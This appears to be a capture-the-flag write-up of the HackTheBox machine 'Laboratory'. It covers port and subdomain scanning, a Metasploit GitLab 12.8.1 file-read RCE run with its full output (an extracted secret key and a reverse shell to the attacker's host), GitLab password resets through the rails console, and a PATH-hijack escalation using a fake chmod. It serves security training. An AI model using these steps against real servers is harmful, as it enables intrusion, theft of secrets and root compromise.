$ nmap -p- --min-rate 5000 10.129.78.175
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 17:18 +08
Nmap scan report for 10.129.78.175
Host is up (0.043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
We have to add laboratory.htb to our /etc/hosts file to access the web ports.
Laboratory -> Gitlab RCE
The website is some kind of company page for coding services:
The background animated thing is pretty cool honestly. Anyways, this looked pretty static, so I did a subdomain and directory scan on the site, and found one git subdomain.
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc=200 -H 'Host: FUZZ.laboratory.htb' -u https://laboratory.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://laboratory.htb/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000262: 302 0 L 5 W 105 Ch "git"
When we visit this subdomain, it reveals a GitLab instance.
When trying to create a user, it appears we have to have a specific email domain being used.
Using laboratory.htb works as the email domain, then we can view the dashbaord:
Interestingly, this was running GitLab 12.8.1, which is an outdated version of the software.
This version is vulnerable to an LFI.
It was also vulnerable to RCE exploits.
There was a Metasploit module for it, which I honestly wanted to try and it works!
msf6 exploit(multi/http/gitlab_file_read_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user test123
[*] Created project /test123/7fc8Znm1
[*] Created project /test123/QoNdBDpL
[*] Created issue /test123/7fc8Znm1/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20230629173041_default_10.129.78.175_gitlab.secrets_009016.txt'
[+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /test123/7fc8Znm1
[*] Deleted project /test123/7fc8Znm1
[*] Attempting to delete project /test123/QoNdBDpL
[*] Deleted project /test123/QoNdBDpL
[*] Command shell session 1 opened (10.10.14.42:4444 -> 10.129.78.175:37260) at 2023-06-29 17:30:50 +0800
id
uid=998(git) gid=998(git) groups=998(git)
I only wanted to use this because I was lazy to set up the Docker containers required for the exploit.
Privilege Escalation
GitLab Rails -> SSH Key
This shell was spawned within a container, and there weren't any users in the home directory.
The main thing I was looking for was credentials to any other users on the Gitlab instance, since they may have interesting files to look at. I googled more about password for Gitlab, and found methods to reset the user's password.
The documentation states that need to start a rails console, which we can do using gitlab-rails console.
I downloaded a copy of this binary to my Kali machine because it looks custom and I could not find any other software online matching this. Then, I opened up a copy in Ghidra. The program is really simple:
The funny thing is that the binary is using the full path for the target file, but chmod itself doesn't have the full path specified. All we have to do is create an program that is called chmod which executes a command as root:
